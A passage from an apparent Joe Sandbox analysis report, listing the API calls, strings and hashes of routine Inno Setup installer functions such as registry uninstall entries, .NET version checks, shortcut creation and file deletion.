                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00468BB0 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00468DCA,?,?,00000001,00000000,00000000,00468DE5,?,00000000,00000000,?), ref: 00468DB3
                                                                                                                                                                      Strings
                                                                                                                                                                      • Inno Setup: Deselected Tasks, xrefs: 00468D41
                                                                                                                                                                      • Inno Setup: App Path, xrefs: 00468C72
                                                                                                                                                                      • Inno Setup: User Info: Organization, xrefs: 00468D82
                                                                                                                                                                      • Inno Setup: No Icons, xrefs: 00468C9B
                                                                                                                                                                      • Inno Setup: Selected Components, xrefs: 00468CD2
                                                                                                                                                                      • Inno Setup: Selected Tasks, xrefs: 00468D1F
                                                                                                                                                                      • Inno Setup: User Info: Name, xrefs: 00468D6F
                                                                                                                                                                      • Inno Setup: Setup Type, xrefs: 00468CC2
                                                                                                                                                                      • Inno Setup: Icon Group, xrefs: 00468C8E
                                                                                                                                                                      • Inno Setup: User Info: Serial, xrefs: 00468D95
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C0F
                                                                                                                                                                      • %s\%s_is1, xrefs: 00468C2D
                                                                                                                                                                      • Inno Setup: Deselected Components, xrefs: 00468CF4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                      • API String ID: 47109696-1093091907
                                                                                                                                                                      • Opcode ID: b347b1158433f573fee1faf96bf299f675fa890e2fe86d7ed70746a2c9c7bd73
                                                                                                                                                                      • Instruction ID: 9409bd20b999dcc9be58dd01f280802f9f4acbf4d31626fc1b9235e67c3febe1
                                                                                                                                                                      • Opcode Fuzzy Hash: b347b1158433f573fee1faf96bf299f675fa890e2fe86d7ed70746a2c9c7bd73
                                                                                                                                                                      • Instruction Fuzzy Hash: B451C430A006489BCB11DB65C9917DEB7F5EF98304F50816FE840A7391EB78AE41CB19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004978DC Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 251synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000,00498035,?,00000000), ref: 0049795F
                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000,?,0049802B,00000000), ref: 00497972
                                                                                                                                                                      • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000,00000000), ref: 00497982
                                                                                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004979A3
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00497C74,?,?,00000000,?,00000000), ref: 004979B3
                                                                                                                                                                        • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                                                      • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                                                                      • API String ID: 2000705611-3672972446
                                                                                                                                                                      • Opcode ID: 3abecf7f59280410cecb9ee7484abacaacd75d9dadf8f6f19cf75740d8cdfa5e
                                                                                                                                                                      • Instruction ID: f92775941c35c4987ffcee83f2591dcd2e8f64eb72217f5dcf8b9acaa4e0c6bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 3abecf7f59280410cecb9ee7484abacaacd75d9dadf8f6f19cf75740d8cdfa5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3E91D7306182449FDF11EBA5C856BAE7BF4EB49308F5184B7F500A7392D67CAC05CB19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045A4F8 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 209COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,0045A7B4,?,?,?,?,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 0045A666
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                                      • API String ID: 1452528299-3112430753
                                                                                                                                                                      • Opcode ID: adef362f81e6c44d746d4e6154521a27fbb4249c273f51b16b2da5b9421a95df
                                                                                                                                                                      • Instruction ID: 580fd2345af5d8a11a71580b87de25b1444814d8228b9e74f7717922954df390
                                                                                                                                                                      • Opcode Fuzzy Hash: adef362f81e6c44d746d4e6154521a27fbb4249c273f51b16b2da5b9421a95df
                                                                                                                                                                      • Instruction Fuzzy Hash: E07181307002445BCB01EB6988817AE7BB59F48319F50866BFC01EB383DB7CDE59879A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0045C9E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 182libraryloadermemoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetVersion.KERNEL32 ref: 0045C9FA
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CA1A
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CA27
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CA34
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CA42
                                                                                                                                                                        • Part of subcall function 0045C8E8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045C987,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045C961
                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CAFB
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CC35,?,?,00000000), ref: 0045CB04
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                                                      • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                                                      • API String ID: 59345061-4263478283
                                                                                                                                                                      • Opcode ID: 03abb4199cd210bb98dce0446041b2ba09630258e20d59115a1c6368a0ecbb95
                                                                                                                                                                      • Instruction ID: 7cfcd68cf7d50f34506c8699d7ac6bd3cbd645d605ef7a14e0a5f99aee2185cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 03abb4199cd210bb98dce0446041b2ba09630258e20d59115a1c6368a0ecbb95
                                                                                                                                                                      • Instruction Fuzzy Hash: C25186B1D00308EFDB11DF99C885BAEBBB8EB4C311F14806AF915B7241C6799945CFA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00456538 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 77249680.OLE32(00499A74,00000000,00000001,00499774,?,00000000,00456875), ref: 0045657A
                                                                                                                                                                      • 77249680.OLE32(00499764,00000000,00000001,00499774,?,00000000,00456875), ref: 004565A0
                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0045672D
                                                                                                                                                                      Strings
                                                                                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456712
                                                                                                                                                                      • CoCreateInstance, xrefs: 004565AB
                                                                                                                                                                      • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 0045679E
                                                                                                                                                                      • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 0045668F
                                                                                                                                                                      • IPersistFile::Save, xrefs: 004567FC
                                                                                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456764
                                                                                                                                                                      • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566C3
                                                                                                                                                                      • IPropertyStore::Commit, xrefs: 0045677D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 77249680$FreeString
                                                                                                                                                                      • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                                                                                                      • API String ID: 1303370216-3936712486
                                                                                                                                                                      • Opcode ID: e7a8376c0a8476dae31750e4f8ed5f43461152797dfb0f6d5d6955365234bb9f
                                                                                                                                                                      • Instruction ID: c38ea0ca400292199a4bf55cc3a6d877564858b73cfd7edbf1df179bb9384e2e
                                                                                                                                                                      • Opcode Fuzzy Hash: e7a8376c0a8476dae31750e4f8ed5f43461152797dfb0f6d5d6955365234bb9f
                                                                                                                                                                      • Instruction Fuzzy Hash: A5A12170A00145AFDB50DFA9C885B9E7BF8AF09306F55406AF804E7362DB38DD48CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B3A4 Relevance: 21.1, APIs: 14, Instructions: 126windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 74074D40.GDI32(00000000,?,00000000,?), ref: 0041B3BB
                                                                                                                                                                      • 74074D40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3C5
                                                                                                                                                                      • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3D7
                                                                                                                                                                      • 74076280.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3EE
                                                                                                                                                                      • 7406A670.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B3FA
                                                                                                                                                                      • 74074D00.GDI32(00000000,0000000B,?,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B427
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,0041B45A,00000000,0041B453,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B44D
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object$Select$74074$7406Delete$74076280A580A670Stretch
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2063788168-0
                                                                                                                                                                      • Opcode ID: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                                                                                                                      • Instruction ID: 33ab0b3d7217a913ee79b1f77f60082389afcfeada11791300d2e7ee1e5313f5
                                                                                                                                                                      • Opcode Fuzzy Hash: eea4d520f28c0b9b1f45a8d73eca5c5381e7292da506ec26be0ce79386cc84d5
                                                                                                                                                                      • Instruction Fuzzy Hash: FC41BC71E44619AFDB10DAE9C946FEFB7BCEB08704F104466B614F7281D678AD408BA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00472930 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 337COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472AE8
                                                                                                                                                                      • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00472BEF
                                                                                                                                                                      • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00472C05
                                                                                                                                                                      • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00472C2A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                                                      • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                                                      • API String ID: 971782779-3668018701
                                                                                                                                                                      • Opcode ID: 331cce5eecbe6960ca74d909d360c57c93da41376348f9e0972320c9a3e34020
                                                                                                                                                                      • Instruction ID: fd1e6c444996228d4851cdbb4885a0c41f61386fce8022a34f2115261328fc48
                                                                                                                                                                      • Opcode Fuzzy Hash: 331cce5eecbe6960ca74d909d360c57c93da41376348f9e0972320c9a3e34020
                                                                                                                                                                      • Instruction Fuzzy Hash: 06D13574A001499FDB11EFA9D981BDEBBF4AF08304F50806AF904B7392D778AD45CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00454848 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,?,00000000,?,00000000,00454AE1,?,0045A98A,00000003,00000000,00000000,00454B18), ref: 00454961
                                                                                                                                                                        • Part of subcall function 0042E8C0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453247,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8DF
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 004549E5
                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(0045A98A,00000000,00000000,00000000,?,00000004,00000000,00454A2B,?,0045A98A,00000000,00000000,?,00000000,?,00000000), ref: 00454A14
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548B8
                                                                                                                                                                      • RegOpenKeyEx, xrefs: 004548E4
                                                                                                                                                                      • , xrefs: 004548D2
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045487F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                                      • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                      • API String ID: 2812809588-1577016196
                                                                                                                                                                      • Opcode ID: fd3241b20ec0769767c0aa971faad2655caa9f6c4e661cae2be9a250e32ec68a
                                                                                                                                                                      • Instruction ID: ff4e522da132bb0e31d6f3ae6b90b680e2e6169bdaf0a1bf0a59660f44ee0e74
                                                                                                                                                                      • Opcode Fuzzy Hash: fd3241b20ec0769767c0aa971faad2655caa9f6c4e661cae2be9a250e32ec68a
                                                                                                                                                                      • Instruction Fuzzy Hash: 5B912571E44108ABDB40DFD5D942BDEB7F8EB48309F10406AF900FB682D6789E459B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00459278 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00459184: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 0045931F
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 00459389
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00459479,?,00000000,00000000,00000000), ref: 004593F0
                                                                                                                                                                      Strings
                                                                                                                                                                      • v1.1.4322, xrefs: 004593E2
                                                                                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004593A3
                                                                                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 004592D2
                                                                                                                                                                      • .NET Framework version %s not found, xrefs: 00459429
                                                                                                                                                                      • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 0045933C
                                                                                                                                                                      • v4.0.30319, xrefs: 00459311
                                                                                                                                                                      • .NET Framework not found, xrefs: 0045943D
                                                                                                                                                                      • v2.0.50727, xrefs: 0045937B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$Open
                                                                                                                                                                      • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                                      • API String ID: 2976201327-446240816
                                                                                                                                                                      • Opcode ID: f9e6a1d3a2181e0780317b25d6716f6f88185fc20c3c0eaf3c928b57ff4bf5ad
                                                                                                                                                                      • Instruction ID: b06f59bb3d6be91165b8bdbc27cbaff9901adf20ec6b7ffb5bff20868c6d7bc9
                                                                                                                                                                      • Opcode Fuzzy Hash: f9e6a1d3a2181e0780317b25d6716f6f88185fc20c3c0eaf3c928b57ff4bf5ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F51A131A04144EBCB00DFA988A17EE77B6DB49305F54447BE800DB382E63D9E0ACB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00458864 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0045889B
                                                                                                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004588B7
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004588C5
                                                                                                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 004588D6
